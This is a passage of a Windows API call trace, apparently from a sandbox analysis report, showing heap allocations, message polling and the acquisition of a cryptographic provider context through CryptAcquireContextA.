wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.389] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0145.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0145.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0145.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0145.390] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e698c8 [0145.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0145.391] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0145.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0145.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0145.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0145.392] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0145.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0145.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0145.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0145.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0145.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0145.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0145.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0145.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0145.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0145.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0145.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0145.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0145.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0145.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0145.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0145.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0145.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0145.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0145.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0145.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0145.398] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0145.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.399] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.399] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0145.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, 